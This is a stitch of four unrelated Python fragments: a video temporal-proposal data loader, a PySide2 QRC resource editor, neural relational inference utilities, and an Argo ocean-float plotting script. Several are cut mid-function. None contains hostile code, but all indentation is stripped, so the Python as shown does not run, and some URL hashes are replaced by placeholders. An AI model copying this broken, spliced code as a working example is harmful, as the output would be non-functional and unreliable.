def featstamp_to_time(self, start_f, end_f, nfeats, duration):
time_per_feat = duration / nfeats
start = min(max(0, start_f * time_per_feat), duration - time_per_feat)
end = max(end_f * time_per_feat, start + time_per_feat)
return start, end
def get_SOTA_TEP_label(self, video_id, nfeats):
duration = self.data[video_id]['duration']
others = {}
SOTA_featstamps = None
SOTA_Prop_score = None
SOTA_timestamps = None
if video_id[2:] in self.SOTA_TEP_Poporal.keys():
SOTA_timestamps = [event['segment'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
SOTA_featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in SOTA_timestamps]
SOTA_Prop_score = [event['score'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
# others['SOTA_featstamps'] = SOTA_featstamps
# others['SOTA_Prop_score'] = SOTA_Prop_score
return SOTA_featstamps, SOTA_Prop_score, SOTA_timestamps
def get_vid_data(self, video_id, nfeats):
# feats = features[video_id]["c3d_features"]
duration = self.data[video_id]['duration']
timestamps = self.data[video_id]['timestamps']
featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in timestamps]
SOTA_featstamps = None
SOTA_Prop_score = None
if self.use_SOTA_tep:
if video_id[2:] in self.SOTA_TEP_Poporal.keys():
SOTA_timestamps = [event['segment'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
SOTA_featstamps = [self.timestamp_to_featstamp(x, nfeats, duration) for x in SOTA_timestamps]
SOTA_Prop_score = [event['score'] for event in self.SOTA_TEP_Poporal[video_id[2:]]]
time_per_feat = duration / nfeats
nb_prop = len(featstamps)
iou_scores = np.zeros([nfeats, self.K], dtype='float32')
gts_index = np.zeros([nfeats, self.K], dtype='float32')
S_iou_scores = np.zeros([nfeats, nfeats], dtype='float32')
# gt_captured = []
tap_masks = np.zeros([nfeats, self.K], dtype='float32')
S_tap_masks = np.zeros([nfeats, nfeats], dtype='float32')
for index in range(nfeats):
tap_masks[index, :min(self.K, index)] = 1
for t in range(nfeats):
for k in xrange(self.K):
if t >= k + 1:
iou, gt_index = self.iou([t - k - 1, t], featstamps, return_index=True)
iou_scores[t, k] = iou
gts_index[t, k] = gt_index
S_iou_scores[t - k - 1, t] = iou
S_tap_masks[t - k - 1, t] = 1
others = {}
others['S_iou_scores'] = S_iou_scores
others['S_tap_masks'] = S_tap_masks
others['SOTA_featstamps'] = SOTA_featstamps
others['SOTA_Prop_score'] = SOTA_Prop_score
return iou_scores, tap_masks, gts_index, featstamps, others
def get_batch(self, split, batch_size=None):
batch_size = batch_size or self.batch_size
wrapped = False
infos = []
prop_captured = []
data = {}
for i in range(batch_size):
# fetch videos,labels,temp_att and some other information
tmp_c3d, tmp_lda, tmp_att, tap_label, tap_masks, iou_scores, gts_index, tap_masks_good_proposal, train_only, w1, | |
resources[index + 1], resources[index]
self.collection.set_dirty(True)
indexes = [index + 1 for index in indexes]
self.update_table(table, resources, indexes)
self.update_ui()
message = "Resource moved" if len(indexes) == 1 else "Resources moved"
self.statusBar().showMessage(message, 5000)
def edit_move_left(self):
"""Move the active tab to the left.
"""
index = self.central_widget.currentIndex()
self.collection[index - 1], self.collection[index] = self.collection[index], self.collection[index - 1]
self.collection.set_dirty(True)
self.update_widget()
self.central_widget.setCurrentIndex(index - 1)
self.statusBar().showMessage("Tab moved", 5000)
def edit_move_right(self):
"""Move the active tab to the right.
"""
index = self.central_widget.currentIndex()
self.collection[index + 1], self.collection[index] = self.collection[index], self.collection[index + 1]
self.collection.set_dirty(True)
self.update_widget()
self.central_widget.setCurrentIndex(index + 1)
self.statusBar().showMessage("Tab moved", 5000)
def edit_move_up(self):
"""Move the selected resource up one line.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = sorted([selected.row() for selected in table.selectionModel().selectedRows()])
for index in indexes:
resources[index - 1], resources[index] = resources[index], resources[index - 1]
self.collection.set_dirty(True)
indexes = [index - 1 for index in indexes]
self.update_table(table, resources, indexes)
self.update_ui()
message = "Resource moved" if len(indexes) == 1 else "Resources moved"
self.statusBar().showMessage(message, 5000)
def edit_paste(self):
"""Paste the content of the clipboard to the resources.
"""
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
new_resources = QApplication.clipboard().text().strip().split("\n")
indexes = []
row = self.central_widget.currentWidget().currentRow() + 1
for data in new_resources:
data = data.split("\t")
if len(data) == 1:
if data[0].startswith("file:///"):
file = data[0][len("file:///") + len(os.path.dirname(self.collection.file_name())):]
else:
file = data[0]
resource = qrcdata.Resource(file)
else:
resource = qrcdata.Resource(data[1], data[0])
resources.insert(row, resource)
indexes.append(row)
row += 1
self.update_table(self.central_widget.currentWidget(), self.collection[table_index], indexes)
self.collection.set_dirty(True)
self.update_ui()
self.statusBar().showMessage("Clipboard pasted", 5000)
def edit_remove_resource(self):
"""Remove the selected resource.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = sorted([selected.row() for selected in table.selectionModel().selectedRows()], reverse=True)
message = "Resources removed" if len(indexes) > 1 else "Resource removed"
for index in indexes:
resources.pop(index)
self.collection.set_dirty(True)
self.update_table(table, resources)
self.update_ui()
self.statusBar().showMessage(message, 5000)
def edit_remove_tab(self, index=-1):
"""remove a tab.
Parameters:
index (int) the index of the tab to close, current tab closed if index = -1
"""
if index >= 0:
self.central_widget.setCurrentIndex(index)
reply = QMessageBox.question(self, "QRC Editor - Remove Tab", "Remove the tab and all its resources?",
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.Yes:
self.collection.pop(self.central_widget.currentIndex())
self.collection.set_dirty(True)
self.update_widget()
self.statusBar().showMessage("Tab removed", 5000)
def edit_settings(self):
"""Open the settings dialog.
"""
dialog = qrcdlg.ResourceSettingsDlg(self.options, self)
if dialog.exec_():
self.statusBar().showMessage("Settings updated", 5000)
def edit_sort(self):
"""Open the sort dialog.
"""
dialog = qrcdlg.TabSortDlg(self)
if dialog.exec_():
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
indexes = [selected.row() for selected in table.selectionModel().selectedRows()]
selected_resources = [resources[index] for index in indexes]
if dialog.key_combo_box.currentIndex() == 0:
resources.sort(key=lambda resource: [resource.alias(), resource.file()],
reverse=dialog.reverse_checkbox.isChecked())
else:
resources.sort(key=lambda resource: [resource.file(), resource.alias()],
reverse=dialog.reverse_checkbox.isChecked())
self.collection.set_dirty(True)
indexes = [resources.index(resource) for resource in selected_resources]
self.update_table(table, resources, indexes)
self.update_ui()
self.statusBar().showMessage("Table updated", 5000)
def edit_update(self):
"""Update the table.
"""
table = self.central_widget.currentWidget()
table_index = self.central_widget.currentIndex()
resources = self.collection[table_index]
self.update_table(table, resources, table.currentRow())
self.update_ui()
self.statusBar().showMessage("Table updated", 5000)
def file_compile(self):
"""Compile a resource collection to a .py file.
"""
if not self.ok_to_continue():
return
file_name = self.collection.file_name()[:-4] + ".py"
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Compile Resource Collection File",
file_name, "Python file (*.py)")
if file_name:
options = [self.options["program"], "-o", file_name]
if self.options["no_compress"]:
options.append("-no-compress")
if self.options["compress"]:
options.extend(["-compress", "{0}".format(self.options["compress_level"])])
if self.options["threshold"]:
options.extend(["-threshold", "{0}".format(self.options["threshold_level"])])
options.append(self.collection.file_name())
completed = None
try:
completed = subprocess.run(options, check=True)
except (IOError, OSError, subprocess.CalledProcessError) as err:
QMessageBox.critical(self, "Compile Error", "There was an error during the process: {0}".format(err))
if completed and completed.returncode == 0:
self.statusBar().showMessage("{0} successfully compiled".format(os.path.basename(file_name)), 5000)
def file_new(self):
"""Create a new file.
"""
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Save Resource Collection File",
".", "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
if not self.collection.dirty() and self.collection.file_name().startswith("Unnamed"):
self.collection.set_file_name(file_name)
self.update_ui()
else:
QrcEditor(file_name).show()
def file_open(self):
"""Create the dialog to select and then open a qrc file.
"""
file_dir = os.path.dirname(self.collection.file_name())\
if self.collection.file_name() is not None else "."
file_name, _ = QFileDialog.getOpenFileName(self, "QRC Editor - Load Resource Collection File",
file_dir, "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
if not self.is_open(file_name):
if not self.collection.dirty() and self.collection.file_name().startswith("Unnamed"):
_, message = self.collection.load(file_name)
self.statusBar().showMessage(message, 5000)
else:
QrcEditor(file_name).show()
self.update_widget()
self.update_ui()
@staticmethod
def file_quit():
"""Close all the files and exit the application.
"""
QApplication.closeAllWindows()
def file_save(self):
"""Save a file.
"""
if self.collection.file_name().startswith("Unnamed"):
self.file_save_as()
else:
result, message = self.collection.save()
self.statusBar().showMessage(message, 5000)
self.update_ui()
return result
def file_save_all(self):
"""Save all the files.
"""
count = 0
for editor in QrcEditor.instances:
if editor.collection.dirty():
ok, message = editor.collection.save()
if ok:
count += 1
self.statusBar().showMessage(message, 5000)
self.statusBar().showMessage("Saved {0} of {1} files".format(count, len(QrcEditor.instances)), 5000)
self.update_ui()
def file_save_as(self):
"""Create the dialog to save a new file.
"""
file_name = self.collection.file_name() if self.collection.file_name() else "."
file_name, _ = QFileDialog.getSaveFileName(self, "QRC Editor - Save Resource Collection File",
file_name, "Resource Collection file (*.qrc)")
if file_name:
if file_name[-4:].lower() != ".qrc":
file_name += ".qrc"
result, message = self.collection.save(file_name)
self.statusBar().showMessage(message, 5000)
self.update_widget(self.central_widget.currentIndex())
self.update_ui()
return result
def help_about(self):
"""Open the about message.
"""
message = """<b>QRC Editor</b> v {0}
<p>Copyright © Sanfe Ltd.
All rights reserved.
<p>This application can be used to create and
compile a resource collection file that can
be used in in python pyside2 projects.
<p> Python {1} - Qt {2} - PySide2 {3}
""".format(__version__, platform.python_version(), PySide2.QtCore.__version__, PySide2.__version__)
if self.rcc_version is not None:
message += " - {0}".format(self.rcc_version)
message += " on {0}.<p> Icons by <a href='https://icons8.com'>Icons8</a>".format(platform.system())
QMessageBox.about(self, "About QRC Editor", message)
def load_settings(self):
"""Load settings for the application.
"""
settings = QSettings()
if (geometry := settings.value("Geometry")) is not None:
self.restoreGeometry(geometry)
if (state := settings.value("MainWindow/State")) is not None:
self.restoreState(state)
if (program := settings.value("Options/Program")) and self.check_program(program):
self.options["program"] = program
else:
self.options["program"] = "pyside2-rcc.exe"
if (no_compress := settings.value("Options/NoCompress")) is not None:
self.options["no_compress"] = True if no_compress == "true" else False
if (compress := settings.value("Options/Compress")) is not None:
self.options["compress"] = True if compress == "true" else False
if (compress_level := settings.value("Options/CompressLevel")) is not None:
self.options["compress_level"] = int(compress_level)
if (threshold := settings.value("Options/Threshold")) is not None:
self.options["threshold"] = True if threshold == "true" else False
if (threshold_level := settings.value("Options/ThresholdLevel")) is not None:
self.options["threshold_level"] = int(threshold_level)
def raise_window(self):
"""Raise and make active editor_to_rise
"""
title = self.sender().text().split(maxsplit=1)[1]
for editor in QrcEditor.instances:
if editor.windowTitle()[:-3] == title:
editor.activateWindow()
editor.raise_()
break
def update_table(self, table, resources, current_indexes=[]):
"""Create a table and populate it.
Parameters:
table (QTabWidget): the table to populate
resources: the resources used to populate the table
current_indexes: the list of indexes of the current resources, to keep the correct resource selected
Return:
QTabWidget: the populated table
"""
table.clearSelection()
table.setRowCount(len(resources))
table.setColumnCount(2)
table.setHorizontalHeaderLabels(["Alias", "File"])
table.setAlternatingRowColors(True)
table.setEditTriggers(QTableWidget.NoEditTriggers)
table.setSelectionBehavior(QTableWidget.SelectRows)
table.setSelectionMode(QTableWidget.MultiSelection)
table.setContextMenuPolicy(Qt.ActionsContextMenu)
self.add_actions(table, (self.edit_paste_action, self.edit_copy_action, self.edit_cut_action,
self.edit_add_resource_action, self.edit_edit_resource_action,
self.edit_remove_resource_action, self.edit_move_up_action,
self.edit_move_down_action, self.edit_update_action))
for row, resource in enumerate(resources):
alias = QTableWidgetItem(resource.alias())
file = QTableWidgetItem(resource.file())
if resources.is_duplicate(resource.alias()):
alias.setTextColor(Qt.red)
else:
alias.setTextColor(Qt.black)
if os.path.isfile(os.path.join(os.path.dirname(self.collection.file_name()), resource.file())):
file.setTextColor(Qt.black)
else:
file.setTextColor(Qt.red)
table.setItem(row, 0, alias)
table.setItem(row, 1, file)
table.resizeColumnsToContents()
for index in current_indexes:
table.selectRow(index)
table.setFocus()
return table
def update_ui(self):
"""Update the ui enabling and disabling actions.
"""
file_name_exist = (file_name := self.collection.file_name()) is not None
table_exist = (table := self.central_widget.currentWidget()) is not None
resource_selected = table_exist and len(table.selectionModel().selectedRows()) > 0
multiple_rows = table_exist and table.rowCount() > 1
multiple_tables = len(self.collection) > 1
self.setWindowTitle("QRC Editor - {0}[*]".format(os.path.basename(file_name)))
self.setWindowModified(self.collection.dirty())
if table_exist:
self.edit_edit_tab_action.setEnabled(True)
self.edit_remove_tab_action.setEnabled(True)
else:
self.edit_edit_tab_action.setEnabled(False)
self.edit_remove_tab_action.setEnabled(False)
if resource_selected:
self.edit_edit_resource_action.setEnabled(True)
self.edit_remove_resource_action.setEnabled(True)
self.edit_copy_action.setEnabled(True)
self.edit_cut_action.setEnabled(True)
else:
self.edit_edit_resource_action.setEnabled(False)
self.edit_remove_resource_action.setEnabled(False)
self.edit_copy_action.setEnabled(False)
self.edit_cut_action.setEnabled(False)
if file_name_exist and table_exist:
self.edit_add_resource_action.setEnabled(True)
self.file_compile_action.setEnabled(True)
else:
self.file_compile_action.setEnabled(False)
self.edit_add_resource_action.setEnabled(False)
if multiple_rows and resource_selected:
indexes = [selected.row() for selected in table.selectionModel().selectedRows()]
self.edit_move_down_action.setEnabled(max(indexes) < table.rowCount() - 1)
self.edit_move_up_action.setEnabled(min(indexes) > 0)
else:
self.edit_move_down_action.setEnabled(False)
self.edit_move_up_action.setEnabled(False)
if multiple_tables:
self.edit_move_left_action.setEnabled((index := self.central_widget.currentIndex()) > 0)
self.edit_move_right_action.setEnabled(index < len(self.collection) - 1)
else:
self.edit_move_left_action.setEnabled(False)
self.edit_move_right_action.setEnabled(False)
self.edit_sort_action.setEnabled(multiple_rows)
self.edit_update_action.setEnabled(len(self.collection) > 0)
def update_widget(self, current=None):
"""Update the central widget populating the tabs.
Parameters:
current (int): the index of the current tab, to keep it in focus
"""
self.central_widget.clear()
for index, resources in enumerate(self.collection):
title = ""
if index < 10:
title += "&{0} - Lang: ".format(index)
else:
title += "{0} - Lang: ".format(index)
language = resources.language() if resources.language() is not None else "Default"
title += language
if resources.prefix() is not None:
title += " - Prefix: {0}".format(resources.prefix())
table = QTableWidget()
self.update_table(table, resources)
table.itemSelectionChanged.connect(self.update_ui)
table.itemDoubleClicked.connect(self.edit_edit_resource)
QShortcut(QKeySequence("Return"), table, self.edit_edit_resource)
self.central_widget.addTab(table, QIcon(":/icon.png"), title)
if current:
self.central_widget.setCurrentIndex(current)
def update_window_menu(self):
"""Update the window | |
"""
This code is based on https://github.com/ekwebb/fNRI which in turn is based on https://github.com/ethanfetaya/NRI
(MIT licence)
"""
import numpy as np
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
from torch.autograd import Variable
from itertools import permutations, chain
from math import factorial
from os import path
def my_softmax(input, axis=1):
trans_input = input.transpose(axis, 0).contiguous()
soft_max_1d = F.softmax(trans_input, dim=0) # added dim=0 as implicit choice is deprecated, dim 0 is edgetype due to transpose
return soft_max_1d.transpose(axis, 0)
def binary_concrete(logits, tau=1, hard=False, eps=1e-10):
y_soft = binary_concrete_sample(logits, tau=tau, eps=eps)
if hard:
y_hard = (y_soft > 0.5).float()
y = Variable(y_hard.data - y_soft.data) + y_soft
else:
y = y_soft
return y
def binary_concrete_sample(logits, tau=1, eps=1e-10):
logistic_noise = sample_logistic(logits.size(), eps=eps)
if logits.is_cuda:
logistic_noise = logistic_noise.cuda()
y = logits + Variable(logistic_noise)
return F.sigmoid(y / tau)
def sample_logistic(shape, eps=1e-10):
uniform = torch.rand(shape).float()
return torch.log(uniform + eps) - torch.log(1 - uniform + eps)
def sample_gumbel(shape, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from Gumbel(0, 1)
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
U = torch.rand(shape).float()
return - torch.log(eps - torch.log(U + eps))
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/3<PASSWORD>
Draw a sample from the Gumbel-Softmax distribution
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
(MIT license)
"""
gumbel_noise = sample_gumbel(logits.size(), eps=eps)
if logits.is_cuda:
gumbel_noise = gumbel_noise.cuda()
y = logits + Variable(gumbel_noise)
return my_softmax(y / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcf<PASSWORD>9<PASSWORD>3
Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
tau: non-negative scalar temperature
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probability distribution that sums to 1 across classes
Constraints:
- this implementation only works on batch_size x num_features tensor for now
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
if hard:
shape = logits.size()
_, k = y_soft.data.max(-1)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
y_hard = torch.zeros(*shape)
if y_soft.is_cuda:
y_hard = y_hard.cuda()
y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
y = Variable(y_hard - y_soft.data) + y_soft
else:
y = y_soft
return y
def my_sigmoid(logits, hard=True, sharpness=1.0):
edges_soft = 1/(1+torch.exp(-sharpness*logits))
if hard:
edges_hard = torch.round(edges_soft)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
if edges_soft.is_cuda:
edges_hard = edges_hard.cuda()
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
edges = Variable(edges_hard - edges_soft.data) + edges_soft
else:
edges = edges_soft
return edges
def binary_accuracy(output, labels):
preds = output > 0.5
correct = preds.type_as(labels).eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def edge_type_encode(edges): # this is used to gives each 'interaction strength' a unique integer = 0, 1, 2 ..
unique = np.unique(edges)
encode = np.zeros(edges.shape)
for i in range(unique.shape[0]):
encode += np.where( edges == unique[i], i, 0)
return encode
def loader_edges_encode(edges, num_atoms):
edges = np.reshape(edges, [edges.shape[0], edges.shape[1], num_atoms ** 2])
edges = np.array(edge_type_encode(edges), dtype=np.int64)
off_diag_idx = np.ravel_multi_index(
np.where(np.ones((num_atoms, num_atoms)) - np.eye(num_atoms)),
[num_atoms, num_atoms])
edges = edges[:,:, off_diag_idx]
return edges
def loader_combine_edges(edges):
edge_types_list = [ int(np.max(edges[:,i,:]))+1 for i in range(edges.shape[1]) ]
assert( edge_types_list == sorted(edge_types_list)[::-1] )
encoded_target = np.zeros( edges[:,0,:].shape )
base = 1
for i in reversed(range(edges.shape[1])):
encoded_target += base*edges[:,i,:]
base *= edge_types_list[i]
return encoded_target.astype('int')
def load_data_NRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode(edges_train, num_atoms)
edges_valid = loader_edges_encode(edges_valid, num_atoms)
edges_test = loader_edges_encode(edges_test, num_atoms)
edges_train = loader_combine_edges(edges_train)
edges_valid = loader_combine_edges(edges_valid)
edges_test = loader_combine_edges(edges_test)
feat_train = torch.FloatTensor(feat_train)
edges_train = torch.LongTensor(edges_train)
feat_valid = torch.FloatTensor(feat_valid)
edges_valid = torch.LongTensor(edges_valid)
feat_test = torch.FloatTensor(feat_test)
edges_test = torch.LongTensor(edges_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def load_data_fNRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode( edges_train, num_atoms )
edges_valid = loader_edges_encode( edges_valid, num_atoms )
edges_test = loader_edges_encode( edges_test, num_atoms )
edges_train = torch.LongTensor(edges_train)
edges_valid = torch.LongTensor(edges_valid)
edges_test = torch.LongTensor(edges_test)
feat_train = torch.FloatTensor(feat_train)
feat_valid = torch.FloatTensor(feat_valid)
feat_test = torch.FloatTensor(feat_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def to_2d_idx(idx, num_cols):
idx = np.array(idx, dtype=np.int64)
y_idx = np.array(np.floor(idx / float(num_cols)), dtype=np.int64)
x_idx = idx % num_cols
return x_idx, y_idx
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def get_triu_indices(num_nodes):
"""Linear triu (upper triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
triu_indices = (ones.triu() - eye).nonzero().t()
triu_indices = triu_indices[0] * num_nodes + triu_indices[1]
return triu_indices
def get_tril_indices(num_nodes):
"""Linear tril (lower triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
tril_indices = (ones.tril() - eye).nonzero().t()
tril_indices = tril_indices[0] * num_nodes + tril_indices[1]
return tril_indices
def get_offdiag_indices(num_nodes):
"""Linear off-diagonal indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
offdiag_indices = (ones - eye).nonzero().t()
offdiag_indices = offdiag_indices[0] * num_nodes + offdiag_indices[1]
return offdiag_indices
def get_triu_offdiag_indices(num_nodes):
"""Linear triu (upper) indices w.r.t. vector of off-diagonal elements."""
triu_idx = torch.zeros(num_nodes * num_nodes)
triu_idx[get_triu_indices(num_nodes)] = 1.
| |
<reponame>DangoMelon/turbo-octo-winner
import datetime
import os
import argopy
import geopandas as gpd
import gsw
import numpy as np
import pandas as pd
import xarray as xr
from argopy import DataFetcher as ArgoDataFetcher
from argopy import IndexFetcher as ArgoIndexFetcher
from dmelon.ocean.argo import build_dl, launch_shell
from geopandas.tools import sjoin
def findPointsInPolys(pandas_df, shape_df):
# Create GeoDataFrame from pandas dataframe
argo_geodf = gpd.GeoDataFrame(
pandas_df,
geometry=gpd.points_from_xy(
pandas_df.longitude, pandas_df.latitude, crs="EPSG:4326"
),
)
# Make spatial join to filer out values outside the shapefile
pointInPolys = sjoin(argo_geodf, shape_df, op="within", how="inner")
return pointInPolys
def maskVariableShape(variable, shape):
return variable.where(
shape.mask(variable.sel(lat=slice(-20, 0), lon=slice(-90, -70))) == 0
)
# godas_clim = xr.open_dataset("godas_clim_month.nc").pottmp
# godas_zero = godas_clim.isel(level=0)
# godas_zero["level"] = 0
# godas_clim = xr.concat([godas_zero, godas_clim], dim="level")
# godas_clim
import cmocean as cmo
# import cartopy.crs as ccrs
# import cartopy.feature as cfeature
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import regionmask
# from dmelon.plotting import HQ_BORDER, format_latlon
### PLOT ###
def makePlot(
psal,
psal_raw,
temp,
temp_raw,
sla,
taux,
tauy,
ssta,
latest_date,
out_path="",
depth=850,
):
fig = plt.figure(constrained_layout=True, figsize=(8, 8), dpi=300)
spec = gridspec.GridSpec(ncols=1, nrows=4, figure=fig, height_ratios=[1, 1, 2, 2])
f_ax0 = fig.add_subplot(spec[3, :])
f_ax1 = fig.add_subplot(spec[2, :], sharex=f_ax0)
f_ax2 = fig.add_subplot(spec[1, :], sharex=f_ax0)
f_ax3 = fig.add_subplot(spec[0, :], sharex=f_ax0)
### SAL
plot_data_smooth = (
psal.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
cmap=cmo.cm.haline,
levels=33,
ax=f_ax0,
yincrease=False,
cbar_kwargs=dict(label="Salinity", pad=-0.09, ticks=np.arange(33.5, 35.2, 0.2)),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
levels=17,
ax=f_ax0,
colors="k",
